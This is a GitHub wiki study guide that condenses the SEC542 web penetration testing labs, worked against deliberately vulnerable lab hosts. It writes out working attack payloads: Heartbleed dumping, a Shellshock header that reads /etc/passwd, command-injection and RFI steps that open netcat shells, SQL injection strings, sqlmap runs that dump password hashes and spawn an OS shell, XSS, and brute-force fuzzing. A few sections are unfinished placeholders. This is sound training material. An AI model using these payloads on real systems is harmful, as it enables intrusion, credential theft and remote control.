Labs.md - jlareaux/sec542-study-guide GitHub Wiki
Condensed versions of the SEC542 exercises.
- 542.1 Introduction and Information Gathering
- 542.2 Configuration, Identity and Authentication Testing
- 542.3 Injection
- 542.4 JavaScript and XSS
- 542.5 CSRF, Logic Flaws and Advanced Tools
- Common Tasks
App 🔧
View 🔎
Edit 🔁 🔄
Top 🔝 ☝️ 👆
Login 🔑
Repeat 🔁 🔄
info ℹ️
ZAP ⚡
Burp ⭐
Wait ⌛
Decode 🔓
Inject 💉
Link 🔗
??? ❓ ❔
Idea/concept 💡
Output 👉 ➡️ ↪️
Warn/Stop
Misc 👉 📁 📂 🔩 💊 💣 ▫️ ◽ ◻️ ⬜ ✅ 📖 📝 💪
sqlmap
- Book 1, Pages 69-77
-
Search DNS records
- 🔧 Dig:
$ dig sec542.org -t any
- 🔧 Dig:
-
Attempt a Zone Transfer
- 🔧 Dig:
$ dig sec542.org -t axfr - 🔧 DNSRecon:
$ dnsrecon.py -a -d sec542.org - 🔧 Nmap:
$ nmap --script=dns-zone-transfer sec542.org
- 🔧 Dig:
-
DNS Brute Force Scan
- 🔧 Nmap:
- Default wordlist:
$ nmap --script=dns-brute sec542.com- 👉 Returns 5 records.
- Custom wordlist:
$ nmap --script=dns-brute sec542.com --script-args=dns-brute.hostlist=/opt/dnsrecon/namelist.txt- 👉 Returns 6 records.
- Default wordlist:
- 🔧 DNSRecon:
- Default wordlist:
$ dnsrecon.py -t brt -d sec542.com -D /opt/dnsrecon/namelist.txt- 👉 Returns 6 records.
- Default wordlist:
-
Improve Results with Custom Wordlists
- Using the DNSRecon wordlist returned more results than the Nmap wordlist.
- 💡 Compare wordlists, use word count (
wc) with the lines flag (-l):-
Nmap wordlist:
$ wc -l /usr/local/share/nmap/nselib/data/vhosts-default.lst- 👉 127 lines.
-
DNSRecon wordlist:
$ wc -l /opt/dnsrecon/namelist.txt- 👉 1907 lines.
-
Nmap wordlist:
- ℹ️ Either tool can use a custom wordlist.
- 🔧 Nmap:
-
Reverse DNS (PTR) Scan
- 🔧 Metasploit:
$ msfconsole > use auxiliary/gather/dns_reverse_lookup > set RANGE 192.168.1.0/24 > run
- 🔧 DNSRecon:
$ dnsrecon.py -r 192.168.1.0/24- Requires the reverse scan flag(
-r).
- Requires the reverse scan flag(
- 🔧 Nmap:
$ nmap -sL 192.168.1.0/24| grep \- Lists(
-sL) every address from 192.168.1.0 to 192.168.1.255. Append| grep \to filter the output.
- Lists(
- 🔧 Metasploit:
-
Search DNS records
- Book 1, Pages 134-141
-
Listen to Traffic
- 🔧 Wireshark:.
- Launch and capture traffic on any interface.
- Firefox > Bookmarks > open HTTP Request/Response.
- 🔧 Wireshark:.
-
Craft a HTTP POST Request
- 🔧 Netcat:
$ nc www.sec542.org 80 <press enter> POST /form_auth/login.php HTTP/1.0 <press enter> Content-Length: 34 <press enter> <press enter> user=marvin&pass=test&button=Login <press enter>
- 🔧 Netcat:
-
Analyze Traffic
- 🔧 Wireshark:
- Stop capturing traffic.
- Follow the TCP streams:
- Type
http.request.methodinto the Filter: input and click apply. - Right-click GET /exercise1.html > choose Follow TCP stream.
- Note the client header, including the User-Agent, Host and other fields.
- Whireshark displays client traffic in red and server traffic in blue.
- 🔁 Repeat step 1.
- Right-click POST /form_auth/login.php > choose Follow TCP stream.
- Note the lack of User-Agent, Accept- headers and other fields.
- Type
- 🔧 Wireshark:
-
Listen to Traffic
- Book 1, Pages 153-157
-
Test HTTPS configuration
- Run the ssl-enum-ciphers NSE script and save the results to file
-oN. -
www.sec542.org:
$ nmap -p 443 --script=ssl-enum-ciphers www.sec542.org -oN /tmp/www.sec542.org.nmap.- Note the 'least strength' letter grade C.
-
heart.bleed:
$ nmap -p 443 --script=ssl-enum-ciphers heart.bleed -oN /tmp/heart.bleed.nmap.- Note the 'least strength' letter grade E.
- Find the responsible cipher.
-
heart.bleed:
$ grep "\- E" /tmp/heart.bleed.nmap.- Outputs TSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA.
- Run the ssl-enum-ciphers NSE script and save the results to file
-
Test HTTPS configuration
- Book 1, Pages 165-173
- *Test for Heartbleed
- 🔧 Nmap
-
sec542.org:
$ nmap -p 443 --script ssl-heartbleed sec542.org. - Not vulnerable, output will not indicate.
-
heart.bleed:
$ nmap -p 443 --script ssl-heartbleed heart.bleed. - Vulnerable, output will indicate this.
- heart.bleed was added to /etc/hosts and resolves to 127.3.3.3.
-
sec542.org:
- 🔧 Nmap
-
Exploit Heartbleed
- 🔧 Firefox: >
- ℹ️ Chrome handles the referrer field differently, and may omit some output.
- Visit https://heart.bleed.
- Click Heartbleed Exercise.
- 🔑 Login
user1,pass1.
- These values will be dumped later.
- 🔧 heartbleed.py:
$ heartbleed.py heart.bleed |less. - Be sure to run from a location that allows write access (ie /home/user).
- The user and pass from step 2 will not be present after the first submission.
- 🔁 Continue Exploiting.
- Repeat logging in, incrementing the username and password each time.
- E.g. user1, user2, usr3...
- Run heartbleed.py:.
- 🔎 View the output and look for the previously entered username and password.
- If the second attempt does not yield the username and password, repeat until successful.
- ℹ️ The heartbleed.py script creates a file named dump.bin containing a bianary copy of all dumped RAM.
- 🔎 View the printable strings:
$ strings dump.bin. - The above command assumes 'dump.bin' is in the working directory.
- 🔎 View the printable strings:
- 🔧 Firefox: >
- *Test for Heartbleed
- Book 2, Pages 15-18
- 🔧 Netcat:
-
On Port 80:
$ nc www.sec542.org 80 <press enter> $ HEAD / HTTP/1.0 <press enter> $ <press enter>
-
On Port 443:
$ nc www.sec542.org 443 <press enter> $ HEAD / HTTP/1.0 <press enter> $ <press enter>
- This should output a HTTP/1.1 400 Bad Request error beacause netcat did not negotiate ssl. It still divulges the server information, however.
-
- 🔧 Nmap:
- Version Detection:
$ nmap -sV www.sec542.org - Use NSE scripts:
nmap --script=script-name.txt www.target.host- 🔎 View available scripts:
ls -l /usr/local/share/nmap/scripts - Example, robots.txt detection:
-
http-robots.txt.nse:
$ nmap --script=http-robots.txt www.sec542.org
-
http-robots.txt.nse:
- 🔎 View available scripts:
- Version Detection:
- 🔧 Netcat:
- Book 2, Pages 38-49
-
Shellshocking
- ⭐ Burp:
- Enable Burp.
- Burp > Proxy > Intercept > select Intercept is on.
- Firefox > Bookmarks > Exercies > select Shellshock Netstat.cgi.
-
Burp > Proxy > Intercept >
-
Raw > change the User-Agent:
User-Agent: () { 42;};echo;/bin/cat /etc/passwd. - Select 'Intercept is off'.
-
Raw > change the User-Agent:
-
Firefox should display the password file contents.
- 🔁 If not, repeat steps 2-4.
- Injecting other commands.
- 🔁 Repeat steps 2-4 using:
User-Agent: () { 42;};echo;/usr/bin/id.
- 🔁 Repeat steps 2-4 using:
- Disable Burp.
- 🔧 cURL:
- /etc/passwd:
$ curl -A "() { 42;};echo;/bin/cat /etc/passwd" http://127.0.0.1/cgi-bin/netstat.cgi. - /usr/bin/id:
$ curl -A "() { 42;};echo;/usr/bin/id" http://127.0.0.1/cgi-bin/netstat.cgi. - Syntax:
$ curl -A "<User-Agent>" <URL>.
- /etc/passwd:
- ⭐ Burp:
- When injecting commands, the full path to the command must be used.
-
Shellshocking
- Book 2, Pages 65-75
- 🔧 Wget:
- Download:
$ wget -r http:/www.sec542.org -P /tmp/.- The
-rflag enables recursive retrieving. - The
-Pflag sets the directory where downloads are saved to.
- The
- List:
$ ls -alh /tmp/www.sec542.org.
- Download:
- 🔧 ZAP:
- Enable ZAP.
- Scope tab > right-click target > choose Attack > Spider.
- Scope window > click Start Scan.
- Disable ZAP.
- 🔧 Burp:
- Enable Burp.
- Spider tab > click Spider is paused.
- ℹ️ Control prompting for input on auth-related forms: Spider > Options tab.
- Target tab > view the results.
- Disable Burp.
- 🔧 CeWL:
- Change to the CeWL directory:
$ cd /opt/cewl. - Run:
$ ./cewl.rb http://sec542.org. - Write the results to a file
-w ~/cewl_wordlist.
- Change to the CeWL directory:
- 🔧 Wget:
- Book 2, Pages 82-89
- Enable ZAP.
- Right-click target > select Attack > select Forced Browse Site.
- 🔎 View newly discovered URLs.
- Right-click URL > select Open URL in Browser.
- Disable ZAP.
- Book 2, Pages 97-106
- ⭐ Enable Burp
-
Capture a request
- 🔧 Firefox:
- Open Bookmarks > select Web Authentication - Forms.
- Use a good username with a bad password to capture the POST to fuzz. Attempt to login using:
- 🔑 Login
user1,pass1.
- 🔑 Login
- 🔧 Firefox:
-
Fuzz the Request
- ⭐ Burp:
- Right-click on the POST: POST /form_auth/login.php HTTP/1.1 > choose Send to Intruder.
-
Intruder tab > Position tab >
- ℹ️ Burp automatically identifies fuzzing positions, highlighted in orange and delineated by the section symbol §).
- Click clear to remove the automatically created fuzzing positions.
- Highlight the previously submitted password: asdf.
- Click Add § to fuzz that request field.
- I.e.
user=marvin&pass=§asdf§&button=Login
- I.e.
-
Payloads tab >
- Payload Sets > set Payload Type > select Runtime file.
- Payload Options > click Select file > select /opt/wordlists/splashdata-worst-passwords-2014.txt.
- Click Start Attack.
- Click OK if there is a demo version warning pops up.
- The input file is only 25 lines, this will work fine. ZAP's fuzzer is unrestricted.
- ⭐ Burp:
-
Fuzzing Results
- From the Intruder window > open the Results tab:
- Open the Response sub-tab:
- All requests will result in a 200 HTTP status code, which is common.
- Sorting by length can be useful. Longer responses can be revealing:
- 🔓 The cracked password is letmein.
- Open the Response sub-tab:
- From the Intruder window > open the Results tab:
- Disable Burp.
- Book 2, Pages 115-131
- ℹ️ Apache User Directories
- The Apache mod_userdir🔗 Module maps user-specific directories to URIs.
- A common mapping is /home/username/public_html to www.example.com/~username.
- The most common username format is the first initial and last name.
- E.g. Arthur Dent's username would be adent.
- This Module is not enabled by default.
- The UserDir🔗 Directive sets the user directory to use when a request is received.
- Enabling User Directories:
- Uncomment the line
#Include conf/extra/httpd-userdir.confin conf/httpd.conf, and adapt httpd-userdir.conf as necessary. - Use the UserDir Directive in a config file.
- See the Apache Documentation Per-user web directories🔗 tutorial.
- Uncomment the line
-
Fuzz user directories
- Generate a list of last names:
-
gedit:
$ gedit ~/lastnames - 📝 Add the following lines:
beeblebrox dent prefect jones smith - Save the file.
- Note: The Tilde character
~is expanded🔗 to the path of your user home directory.- E.g. The path ~/lastnames expands to /home/username/lastnames.
-
gedit:
- Fuzz possible usernames by appending each last name with the letter a through z.
- E.g. adent, bdent, cdent, ..., zdent.
- Request the respective URL, returning those with an HTTP 200 response code.
- E.g. www.sec542.org/~adent.
- Generate a list of last names:
- 🔧 find_accounts:
find_accounts ~/lastnames- A custom python script that accepts a list of names.
- 🔎 View the source code:
$ gedit /usr/local/bin/find_accounts - Outputs 5 results: zbeeblebrox, adent, fprefect, hjones and lsmith.
- ⚡ ZAP:
- Enable ZAP
- Firefox: > visit www.sec542.org/~adent/.
-
ZAP >
- History tab > right-click www.sec542.org/~adent/ > choose Attack > Fuzz.
-
Fuzzer window > Fuzz locations tab >
- Highlight a in adent.
- Click Add.
- Payloads window > click Add.
-
Add Payload window >
- set Type > select File Fuzzers.
- set Files > select jbrofuzz > Alphabets > English Alphabet.
- click Add.
- Payloads window > click OK.
- Fuzzer window > click Start Fuzzer.
- Fuzzer tab > sort by Code.
- The Request and Response tabs display info for a selected result.
- Disable ZAP
- ℹ️ Apache User Directories
- Book 2, Pages 154-173
- Enable ZAP
-
Basic Authentication
- ℹ️ Use HTTP status codes to determine if a request was successful. Useful for a brute force attack.
- 🔧 Firefox > Bookmarks > open Web Authentication - Basic.
- ⚡ ZAP >
- Sites tab > select Sites > http://www.sec542.org/basic/ > GET:Basic.
- Request tab > view the request.
- Response tab > view the response.
- 🔧 Firefox >
- 🔑 Login baduser, badpass.
- 🔑 Login marvin, paranoid.
- ⚡ ZAP >
- History tab > select the request with a 200 status code.
-
Request tab >
- Highlight the hash after Authentication: Basic.
- Right-click hash > choose Encode/Decode/Hash.
- Encode/Decode/Hash window > open Decode tab > view Base 64 Decode.
- Request tab > copy the hash after Authentication: Basic.
- Run:
echo <hash> | base64 -d
-
Digest Authentication
- ℹ️ Use HTTP status codes to determine if a request was successful. Useful for a brute force attack.
- 🔧 Firefox >
- Bookmarks > open Web Authentication - Digest.
- 🔑 Login baduser, badpass.
- 🔑 Login trillian, towel.
- ⚡ ZAP >
- Sites tab > select Sites > http://www.sec542.org/basic/ > GET:Digest.
- Request tab > view the request.
- History tab > view request status codes.
-
Digest Authentication
- ℹ️ Use request response sizes to determine if a request was successful.
- 🔧 Firefox >
- Bookmarks > open Web Authentication - Forms.
- 🔑 Login baduser, badpass.
- 🔑 Login ford, galaxy.
- ⚡ ZAP >
- History tab > click Filter button.
-
Filter History window >
- set Tags > select Forms.
- click Apply
- History tab > view the requests.
- Request tab > view request details.
- Disable ZAP
- Book 2, Pages 184-201
- Fuzz possible usernames by appending each last name with the letter a through z.
- E.g. adent, bdent, cdent, ..., zdent.
- Fuzz the login form, returning usernames that are refected in the response.
- Enable ZAP
- 🔧 Firefox >
- set Proxy Selector > select No Proxy.
- Bookmarks > open Username Harvesting.
- 🔑 Login baduser, badpass.
- 🔑 Login adent, badpass.
- The valid username remained filled in on the form.
- Generate a list of last names:
- Use gedit:
$ gedit ~/lastnames - 📝 Add the following lines:
beeblebrox dent prefect jones smith - Save the file.
- Combine with another list:
- Run:
$ cat /opt/wordlists/US-census2000-lastnames-top-100.txt ~/lastnames | sort -u > ~/combined - The new list ~/combined contains the sorted unique (
-u) entries of both files. This makes using the list more efficient. - Use enum_user:
$ enum_user ~/combined -
Advanced Username Harvesting
- 🔧 Firefox >
- Bookmarks > open Timing Attack Username Harvesting.
- 🔑 Login adent, badpass.
- ⚡ ZAP >
- History tab > right-click POST http://www.sec542.org/userenum/securelogin.php > choose Attack > Fuzz.
-
Fuzzer window > Fuzz locations tab >
- Highlight a in adent.
- Click Add.
- Payloads window > click Add.
-
Add Payload window >
- Set Type > select File Fuzzers.
- Set Files > select jbrofuzz > Alphabets > English Alphabet.
- click Add.
- Payloads window > click OK.
- Fuzzer window > Fuzz locations tab > highlight dent in adent > click Add.
- Payloads window > click Add.
-
Add Payload window >
- set Type > select File.
- set File > select /home/student/combined.
- click Add.
- Payloads window > click OK.
- Fuzzer window > click Start Fuzzer.
- ⌛ Be patient, ZAP is fuzzing 2678 requests (103 lastnames X 26 letters).
-
Fuzzer tab >
- sort by RTT.
- The Round Trip Time for valid usernames is 10 times longer than the RTT for invalid usernames.
- 🔓 The passwords for invaid usernames were not hashed with bcrypt.
- Using the default hashing cost of 10, there is a noticable difference in the request times.
- 🔧 Firefox >
- Disable ZAP
- Fuzz possible usernames by appending each last name with the letter a through z.
- Book 2, Pages 27-32
- Exploit an authentication bypass flaw in BASE.
- 🔎 View the vulnerable script:
$ less /var/www/html/base/base_maintenance.php. - Also View:
$ less /var/www/html/base/includes/base_auth.inc.php. -
gedit:
$ gedit ~/Desktop/base_exploit.html. - 📝 Add the following lines:
<html> <head></head> <body> <form method="POST" action="http://www.sec542.org/base/base_maintenance.php"> <input type="hidden" name="standalone" value="yes"> <input type="submit"> </form> </body> </html> - Save the file.
- Desktop > double-click base_exploit.html.
-
Firefox >
- click submit.
- base_maintenance.php will load with authentication bypassed.
- Book 2, Pages 45-55
Inject DNS Lookup
- 🔧 Firefox >
- Bookmarks > open Mutillidae.
- Click OWASP 2013 > Injection (Other) > Command Injection > DNS Lookup.
- ❓ If the Mutillidae page becomes unresponsive, quit and firefox it.
- Set Hostname/IP: > type
sec542.org; cat /etc/passwd. - Click Lookup DNS.
- Set Hostname/IP: > type
sec542.org; id. - Click Lookup DNS.
- The
idcommand show the privileges (uid, gid, group membership) of the current user. - The default path to
idis /usr/bin/id.
- Blind Injection Techniques
- 🔧 Terminal >
- Run
$ sudo tcpdump -ni any icmp[icmptype]=icmp-echo. - This tells tcpdump to not resolve names
-n, listen on all intrfaces-i any, - and capture/display only icmp eho requests
icmp[icmptype]=icmp-echo.
- Run
- 🔧 Firefox > Multillidae page >
- Set Hostname/IP: > type
sec542.org; nc ping -c3 127.0.0.1. - Click Lookup DNS.
- Set Hostname/IP: > type
- Shovel a Shell
- 🔧 Terminal >
- Press ctrl+c to stop the tcpdump.
- Run
$ nc -lvvnp 1337. - This tells netcat to listen
-lon port-p1337 with verbose-vvoutput, and to not resolve names-n.
- 🔧 Firefox > Multillidae page >
- Set Hostname/IP: > type
sec542.org; nc 127.0.0.1 1337 -e /bin/bash. - Click Lookup DNS.
- Set Hostname/IP: > type
- 🔧 Terminal >
- There will be no welcome banner to indicate the shell.
- Try a command:
uname -a. - Press ctrl+c to stop the shell.
- 🔧 Firefox >
- Book 2, Pages 65-77
- LFI
- 🔧 Firefox >
- Bookmarks > open Mutillidae.
- Click Home.
- ❓ If the Mutillidae page becomes unresponsive, quit and firefox it.
- Note the page=home.php GET parameter of the URI in the address bar.
- /ted/passwd exists on most UNIX/linux servers.
- Edit the page URI and load the page.
- Visit
http://mutillidae/index.php?page=/etc/passwd.
-
RFI
- 🔧 Terminal >
- Run
$ gedit /var/www/html/id.txt - 📝 Add the following lines:
<?php echo shell_exec('id'); ?> - Save the file.
- Run
- 🔧 Firefox >
- Edit the URI in the address bar.
- Visit
http://mutillidae/index.php?page=http://127.0.0.1/id.txt.
- 🔧 Terminal >
- Run
$ gedit /var/www/html/shell.txt - 📝 Add the following lines:
<?php echo shell_exec('nc -l -p 4242 -e /bin/bash'); ?> - Save the file.
- Run
- 🔧 Firefox >
- Edit the URI in the address bar.
- Visit
http://mutillidae/index.php?page=http://127.0.0.1/shell.txt.
- 🔧 Terminal >
- Open the backdoor listener:
nc 127.0.0.1 4242. - There will be no welcome banner to indicate the shell.
- Try a command:
uname -a - Press ctrl+c to stop the shell. Mutillidae may become unresponsive otherwise.
- Open the backdoor listener:
- 🔧 Terminal >
- Book 2, Pages 118-127
- 🔧 Firefox >
- Visit
http://www.sec542.org/sqli.php. - Set Employee Phone Lookup > type
Dent. - Click Submit Query.
- Outputs 2 results.
- Induce a error message
- Submit
Dent'.- Outputs a MySQL error message ... syntax to use near ''DENT''' at line 1.
- The payload Dent' caused an error due to unbalnced quotes
'. - Dump all rows
- It appears that input is being passed to a WHERE clause.
- Submit
Dent' OR 1=1;#.- Outputs all rows in the table.
- Remove the comment suffix from the payload and balence the quotes.
- Submit
Dent' OR '1'='1. - Outputs all rows, same as before.
- Current Query Disclosure
- Determine the number of columns in the table.
- Try the following payloads, looking for a MySQL error.
- Submit
Dent' ORDER BY 1;#.- Outputs 1 result.
- Submit
Dent' ORDER BY 2;#.- Outputs 1 result.
- Submit
Dent' ORDER BY 3;#.- Outputs 1 result.
- Submit
Dent' ORDER BY 4;#.- Outputs 1 result.
- Submit
Dent' ORDER BY 5;#.- Outputs a MySQL error message Unknown column '5' in 'order clause'.
- Payload 5 yielded an error, indicating there are 4 columns in the table.
- Determine which columns are displayed in the output.
- Submit
Dent' UNION SELECT '1','2','3','4';#.- Output displays columns 2, 3 and 4.
- Use column 4 to select the info column of the processlist table in the information_schema database.
- Submit
Dent' UNION SELECT '1','2','3',info FROM information_schema.processlist;#.- Outputs SELECT * FROM Customers WHERE lname = 'Dent' UNION SELECT '1','2','3',info FROM information_schema.processlist;#.
- Visit
- 🔧 Firefox >
- Book 2, Pages 167-182
-
Authenticated Session Cookies
- Enable ZAP
- Login to a site, find the session cookie in ZAP, run sqlmap using the cookie.
- 🔧 Firefox >
- Visit
http://dvwa. - 🔑 Login admin, password.
- Page sidebar > click SQL Injection button.
- Set User ID > type 1.
- Outputs without errors.
- Submit 1'.
- Outputs a MySQL error message.
- Visit
- 🔧 ZAP > - Sites tab > select Sites > http://dvwa/ > vulnerabilities > GET:sqli(Submit,id). - Requests tab > highlight PHPSESSID.... - Right-click highlighted text > choose Copy.
- 🔧 Terminal >
- Run sqlmap replacing PHPSESSID... in the below command.
- Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch.- Output shows the id parameter is vulnerable to 4 type of injections. Boolean-based blind, Error-based, UNION query, AND/OR time-based.
- Use a custom User-agent string:
- Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch --user-agent 42. - Count the rows in the Customers table
-Tin the sqli database-D. - Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch --user-agent 42 -D sqli -T Customers --count.- Outputs 56 rows counted.
- Read Get the uid for zbeeblebrox, read the /ets/passwd file.
- Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch --user-agent 42 --read-file /ets/passwd.- Outputs the path to the read file /home/student/.sqlmap/output/dvwa/files/_etc_passwd.
- Grep for the user zbeeblebrox.
- Run
$ grep zbeeblebrox /home/student/.sqlmap/output/dvwa/files/_etc_passwd.- Output shows a uid of 1003
- Dump database users and passwords hashes.
- Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch --user-agent 42 --users --passwords.- Outputs 3 users and password hashes.
- Press ctrl+c to quit the passwrod cracking automatically initiated by the
--batchflag. - Note that users root and drupal have the same password hash, indicating the password are unsalted. Googling for unsalted hashes often yields results. The length of the hash indicates it's SHA-1.
- Determine the column
-Cand table name of the password hashes in the my_wiki database-D. - Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --batch --user-agent 42 --search -D my_wiki -C pass.- Output shows a user_password column in the user table.
- Open a MSF shell using sqlmap.
- MSF needs write access to work properly.
- Run
$ sudo chmod 777 /var/www/dvwa. - Since this command will require custom user input, do not use the --batch flag.
- Run
$ sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=submit --cookie="PHPSESSID..." --proxy http://localhost:8081 --user-agent 42 --os-pwn --msf-path /opt/metasploit-framework.- Use default reponses for prompts, except for the following questions
-
What do you want to use for writable directory? prompt > type
2. -
please provide a comma separated list of absolute directory paths: prompt > type
/var/www/dvwa. -
what is the local address? prompt > type
192.168.1.8.
-
What do you want to use for writable directory? prompt > type
- May not output a banner for the shell.
- Use default reponses for prompts, except for the following questions
- Test the shell.
- Run
id.- Outputs uid=33(www-data) guid=33(www-data) groups=33(www-data).
-
Authenticated Session Cookies
- Book 4, Pages 23-31
- ... Start of lab is missing.
- Add some javascript after the <title>...</title> tag in the page .
- 🔧 Terminal >
- Run
$ gedit ~/Desktop/JavaScript/index.html. - 📝 Add the following line to the head:
<script>alert("Hello World");</script>
- Save the file.
- Run
- 🔧 Firefox >
- Open /home/student/Desktop/JavaScript/index.html.
- Outputs a javascript popup Hello World.
- Run
$ gedit ~/Desktop/JavaScript/index.html. - Edit the previously added <script> tag:
<script src="attack.js"></script> - Edit the opening tag as well:
<body onload="formChange();"> - Save the file.
- 🔧 Firefox >
- Open/Refresh /home/student/Desktop/JavaScript/index.html.
- Set What is your favorite type of sushi? > type 'Toro'.
- Click Submit Query.
- Page should redirect to http://www.sec542.org/.
- Optionally check your work against attack.js.answer and index.html.answer.
- Book 4, Pages 48-53
-
🔧 Firefox >
- Bookmarks > open phpMyAdmin.
- Set Language > select Deutsch - German
- 🔑 Login test, test.
-
The current address URL is: http://www.sec542.org/PhpMyAdmin/index.php?lang=de-utf-8&convcharset=iso-8859-1&collation_connection-utf8_unicode_ci.
-
Modify the query string. Change the lang parameter and remove other GET parameters.
-
Visit http://www.sec542.org/phpmyadmin/index.php?lang=<script>alert("XSS");</script>.
- Outputs a javascript popup Hello World.
-
Stealing Cookies
-
🔧 Terminal >
- Run
$ gedit ~/Desktop/xss_script.txt. - Copy the file contents: press Ctrl+A to select all text, and then Ctrl+C to copy it.
- Run
-
🔧 Firefox >
- Paste your clipboard into the address bar.
-
CURRENT POSITION b # p #
- Visit the ?????????????.
-
🔧 Terminal >
- Run
$ cat /tmp/cookiedump.
- Run
-
- Book 4, Pages 75-95
-
Section
- 🔧 Tool
- Tool > action.
- Run:
$ code ...
- 🔧 Tool
-
Section
- Book 4, Pages 116-128
-
Section
- 🔧 Tool
- Tool > action.
- Run:
$ code ...
- 🔧 Tool
-
Section
- Book 4, Pages 155-173
-
Section
- 🔧 Tool
- Tool > action.
- Run:
$ code ...
- 🔧 Tool
-
Section
- Book 2, Pages 14-25
- Book 2, Pages 30-45
- Book 2, Pages 58-64
- Book 2, Pages 68-78
- Book 2, Pages 93-100
- Book 2, Pages 117-125
- Book 2, Pages 133-144
- Enable Burp/ZAP
- Launch the proxy
- ⌛ ZAP can take ≈ 10 secs to load. Be patient!
- ❓ If a warning pops up, then there are multiple instances of Burp/ZAP running. Close the second instance and use the original one.
- Use Firefox:
- Proxy Selector > select [proxy name]
- Visit the target site to prime the proxy with some traffic.
- Launch the proxy
- Use Firefox > Proxy Selector > select No Proxy
Study Guide: Home, Outline, Index, Glossary, Appendix or Cheatsheets.